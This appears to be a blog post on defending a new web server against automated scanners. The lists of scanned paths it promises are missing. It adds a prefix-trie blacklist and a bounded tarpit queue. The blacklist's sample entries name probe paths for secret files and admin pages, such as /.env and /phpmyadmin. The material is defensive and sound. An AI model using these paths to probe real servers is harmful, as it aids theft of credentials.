My server is scanned with these paths

Within just 2 weeks of releasing a website, my server was being scanned with these URLs. I am publishing them here for my own later reference, and I hope they help others set up protection beforehand.

From the first server (hosted in AWS).


From the second server. It looks like the scanner is Vietnamese because there is a Vietnamese word in the path list.


The list obtained by combining the two lists above, with query strings removed and only the shortest prefixes kept (i.e., if /a/b/c and /a/b are both in the list, /a/b/c is removed).


How to check if a URL is on a blacklist?

I recommend using a trie rather than storing the list in a set. A trie is an efficient structure that supports prefix checks.
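The trie check and the "query string removed, shortest prefixes only" rule from the combined list, as an added example (not code from the original post). The names `PathTrie`, `normalize` and `build_blacklist` are assumptions, collapsing repeated slashes is an added normalization the post does not perform, and the sample entries are a handful of paths from the lists plus a constructed `fbclid` value.

```python
"""Prefix blacklist for request paths, backed by a character trie."""
import re

END = ""  # terminal marker; never collides with a one-character edge label


def normalize(target: str) -> str:
    """Drop query string and fragment, collapse repeated slashes (added assumption)."""
    path = target.split("?", 1)[0].split("#", 1)[0]
    return re.sub(r"/{2,}", "/", path)


class PathTrie:
    def __init__(self):
        self.root = {}

    def add(self, target: str) -> bool:
        """Store a prefix. Returns False when it is unusable or already covered."""
        path = normalize(target)
        if path in ("", "/"):
            return False  # "/?fbclid=..." reduces to "/", which would block the whole site
        node = self.root
        for ch in path:
            if END in node:
                return False  # a shorter stored prefix already covers this path
            node = node.setdefault(ch, {})
        if END in node:
            return False  # exact duplicate
        node.clear()  # longer entries below this point are now redundant
        node[END] = True
        return True

    def match(self, target: str):
        """Return the stored prefix covering target, or None."""
        path = normalize(target)
        node = self.root
        for i, ch in enumerate(path):
            if END in node:
                return path[:i]
            node = node.get(ch)
            if node is None:
                return None
        return path if END in node else None

    def prefixes(self):
        """All stored prefixes, sorted: the 'shortest prefixes only' list."""
        out, stack = [], [("", self.root)]
        while stack:
            prefix, node = stack.pop()
            for key, child in node.items():
                if key == END:
                    out.append(prefix)
                else:
                    stack.append((prefix + key, child))
        return sorted(out)


def build_blacklist(targets):
    trie = PathTrie()
    for target in targets:
        trie.add(target)
    return trie


# Sample input: a few entries from the scan lists; the fbclid value is constructed.
SCANNED = [
    "/config", "/config.js", "/config/getuser?index=0",
    "/wp/wp-login.php", "/wp/", "//wp/wp-includes/wlwmanifest.xml",
    "/phpmyadmin/index.php?lang=en", "/.env", "/.env.backup",
    "/?fbclid=EXAMPLE", "/ab", "/about",
]

if __name__ == "__main__":
    blacklist = build_blacklist(SCANNED)
    print(blacklist.prefixes())
    # Matching is by character prefix and case-sensitive, so "/ab" also
    # covers "/about" while "/PhpMyAdmin/index.php" is not covered.
    for request in ("/config.php?_=1", "/about", "/wp-admin", "/index.html"):
        print(request, "->", blacklist.match(request))
```

Because matching is by character prefix, review short entries such as `/ab` against your real routes before blocking on them.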

How to defend?

There are many ways, but be careful not to overload your server, and make sure that the protection does not increase the probability of a DDoS attack. I suggest the following 3 ways.

  1. Quickly respond to the scanning request. Not elegant, IMHO.
  2. Drop the request at the Transport Layer (the TCP connection) without sending the ACK packet. However, this requires intervention at the lower layer of your server. The scanner may send a keep-alive packet (not the keep-alive HTTP header) at a predefined interval to detect the disconnection.
  3. Maintain a fixed-length queue to hold these requests, respond to them slowly, and close each one after a random length of time. Note that the queue must have a predefined maximum length; otherwise, your server will face a higher chance of a DDoS attack.
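The bounded queue from option 3, as an added example (not code from the original post). The class name `Tarpit`, its parameters and the caller-supplied clock value `now` are assumptions; the connection objects are whatever handle your server uses, shown here as constructed strings.

```python
"""Bounded tarpit: hold scanner connections for a random time, never more than `capacity`."""
import heapq
import itertools
import random


class Tarpit:
    def __init__(self, capacity, min_delay, max_delay, rng=None):
        if capacity < 1 or not 0 <= min_delay <= max_delay:
            raise ValueError("need capacity >= 1 and 0 <= min_delay <= max_delay")
        self.capacity = capacity
        self.min_delay = min_delay
        self.max_delay = max_delay
        self._rng = rng or random.Random()
        self._heap = []                # (deadline, seq, conn), earliest deadline first
        self._seq = itertools.count()  # tie-breaker so conn objects are never compared
        self.rejected = 0

    def __len__(self):
        return len(self._heap)

    def admit(self, conn, now):
        """Hold conn until a random deadline; return the deadline, or None when full.

        On None the caller should answer and close immediately (option 1), so a
        flood of scanner requests can never pin more than `capacity` sockets.
        """
        if len(self._heap) >= self.capacity:
            self.rejected += 1
            return None
        deadline = now + self._rng.uniform(self.min_delay, self.max_delay)
        heapq.heappush(self._heap, (deadline, next(self._seq), conn))
        return deadline

    def release_due(self, now):
        """Pop every connection whose deadline has passed; caller responds and closes."""
        due = []
        while self._heap and self._heap[0][0] <= now:
            due.append(heapq.heappop(self._heap)[2])
        return due


def simulate(burst=5, capacity=3):
    """Constructed scenario: a burst of scanner hits at t=0 against a small tarpit."""
    pit = Tarpit(capacity=capacity, min_delay=5.0, max_delay=20.0)
    held = [c for c in (f"conn-{i}" for i in range(burst))
            if pit.admit(c, now=0.0) is not None]
    early = pit.release_due(now=4.9)   # before min_delay: nothing is released
    late = pit.release_due(now=20.0)   # at max_delay: everything held is released
    return {"held": len(held), "rejected": pit.rejected,
            "released_early": len(early), "released_late": len(late)}


if __name__ == "__main__":
    print(simulate())
```

Call `release_due` from a periodic timer in the server loop; the memory and socket cost is fixed by `capacity` regardless of how fast the scanner sends requests.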